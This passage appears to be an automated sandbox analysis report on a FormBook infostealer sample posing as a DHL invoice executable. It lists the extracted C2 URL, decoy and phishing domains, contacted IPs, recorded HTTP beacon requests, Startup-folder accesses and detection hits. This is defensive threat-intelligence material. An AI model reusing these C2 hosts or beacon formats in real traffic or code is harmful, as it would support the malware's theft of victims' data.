Source: http://www.propertiesforrentus11.bond/jd21/	Avira URL Cloud: Label: phishing
Source: http://www.propertiesforrentus11.bond/jd21/www.tyumk.xyz	Avira URL Cloud: Label: phishing
Source: http://www.emiratesnseic.top/jd21/www.030002787.xyz	Avira URL Cloud: Label: malware
Source: http://www.frametoryframes.shop/jd21/www.dating-dd-de.info	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.weight-loss-003.today/jd21/"], "decoy": ["bankownedproperties-0.bond", "slab-leak-repair-74697.bond", "tvtwenty20sr.top", "scw-iot.net", "circusenergy.online", "030002787.xyz", "propertiesforrentus11.bond", "defi-banksystem.online", "gkbet168.net", "joycasino-ed46.top", "sctttc-or.top", "borghardt.xyz", "therealtorpeddler.info", "macexpress.online", "bobbyharvey.store", "dating-dd-de.info", "thetrue.one", "alqahtani.site", "mahlubini.africa", "truck-driver-jobs-42274.bond", "packaging-services-17231.xyz", "badcreditloans59.xyz", "cellphonesfxw.today", "applyzentavra.com", "basscolofers.shop", "knee-pain-treatment-140741.xyz", "saltyfashion.shop", "quantive.tech", "cldvpn.sbs", "bolehapasaja16.shop", "nextdoor3.store", "forklift-jobs-29768.bond", "pools-99305.bond", "3780.cyou", "solveiterzsolutions.fun", "key-ring.xyz", "replyingendoplasmed.pro", "infanbs.shop", "apple0ficial-ld.info", "stress-relief-44110.bond", "r86gd377hi.rent", "lww20.top", "apartments-for-rent-series.sbs", "emiratesnseic.top", "senior-living-25596.bond", "hostease.cloud", "walk-in-tubs-30303.bond", "childrenfirstcenter.xyz", "45941978.top", "pw7-golden-painting-ldm.lat", "0yf.com", "tyumk.xyz", "utopartses.com", "hearing-aids-77773.bond", "frametoryframes.shop", "mvtb.pics", "speeddeals.online", "cyber-eu.digital", "hm23s.top", "pools-80761.bond", "2002w.app", "authentication-app-69447.bond", "legendhud.shop", "xmld101.icu"]}

Yara detected FormBook

Source: Yara match	File source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Joe Sandbox ML: detected

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: explorer.pdbUGP source: svchost.exe, 00000003.00000003.1510322479.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1508016117.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2667304367.0000000000530000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.1447006703.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1448663351.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1512120743.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1451455558.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1512120743.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1449707067.0000000003800000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.0000000005370000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.000000000550E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1512748826.0000000005018000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1514643940.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000009.00000003.1585809461.0000000003460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.1587047954.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1591635154.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1589838750.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1632870881.0000000004ACD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1625486793.000000000491A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000002.00000003.1447006703.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1448663351.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1512120743.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1451455558.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1512120743.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1449707067.0000000003800000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.0000000005370000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.000000000550E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1512748826.0000000005018000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1514643940.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000009.00000003.1585809461.0000000003460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.1587047954.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1591635154.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1589838750.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1632870881.0000000004ACD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1625486793.000000000491A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: svchost.exe, 0000000A.00000003.1623794995.0000000005700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1624185049.0000000005900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1631509443.0000000005610000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1634982577.0000000000910000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: svchost.exe, 00000003.00000003.1510322479.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1508016117.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2667304367.0000000000530000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000004.00000002.2357034825.0000000010A5F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2683028624.000000000336B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2686373132.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000002.2692699255.000000000A24F000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000004.00000002.2357034825.0000000010A5F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2683028624.000000000336B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2686373132.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000002.2692699255.000000000A24F000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdb source: svchost.exe, 0000000A.00000003.1623794995.0000000005700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1624185049.0000000005900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1631509443.0000000005610000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1634982577.0000000000910000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046DBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0043C2A2 FindFirstFileExW,	0_2_0043C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004768EE FindFirstFileW,FindClose,	0_2_004768EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0047698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0047698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0046D076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0046D3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00479642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00479642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0047979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0047979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00479B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00479B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00475C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00475C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0068DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0065C2A2 FindFirstFileExW,	2_2_0065C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006968EE FindFirstFileW,FindClose,	2_2_006968EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0069698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_0069698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0068D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0068D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00699642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00699642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0069979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0069979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00699B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00699B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00695C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00695C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 4x nop then pop ebx

3_2_00407B1A

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.23.184.95 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.weight-loss-003.today/jd21/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.borghardt.xyz

Source: global traffic	HTTP traffic detected: GET /jd21/?uzud=6Gu9CMF4xxBwNWcJ0Rc7SYqx+yd/BzhFIF9ofXjjgiHpTqtqGAdfmqUQNhv6VtLeomt1&IjBDz2=9rAhxBy0 HTTP/1.1Host: www.authentication-app-69447.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2 HTTP/1.1Host: www.hm23s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 185.53.179.91 185.53.179.91

Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0047CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0047CE44

Source: global traffic	HTTP traffic detected: GET /jd21/?uzud=6Gu9CMF4xxBwNWcJ0Rc7SYqx+yd/BzhFIF9ofXjjgiHpTqtqGAdfmqUQNhv6VtLeomt1&IjBDz2=9rAhxBy0 HTTP/1.1Host: www.authentication-app-69447.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2 HTTP/1.1Host: www.hm23s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.45941978.top
Source: global traffic	DNS traffic detected: DNS query: www.authentication-app-69447.bond
Source: global traffic	DNS traffic detected: DNS query: www.borghardt.xyz
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: www.hm23s.top
Source: global traffic	DNS traffic detected: DNS query: www.alqahtani.site

Source: explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2401347592.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2401347592.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2401347592.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000002.2343353135.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455411195.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.000000000926A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2401347592.0000000009274000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000000.1457725429.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000004.00000002.2345504981.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2341720057.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2345469427.0000000007710000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.030002787.xyz
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.030002787.xyz/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.030002787.xyz/jd21/www.joycasino-ed46.top
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.030002787.xyzReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2002w.app
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2002w.app/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2002w.app/jd21/www.propertiesforrentus11.bond
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2002w.appReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.45941978.top
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.45941978.top/jd21/
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.45941978.top/jd21/www.authentication-app-69447.bond
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.45941978.topReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.alqahtani.site
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.alqahtani.site/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.alqahtani.site/jd21/www.circusenergy.online
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.alqahtani.siteReferer:
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apple0ficial-ld.info
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apple0ficial-ld.info/jd21/
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apple0ficial-ld.info/jd21/Fw
Source: explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apple0ficial-ld.infoReferer:
Source: explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.authentication-app-69447.bond
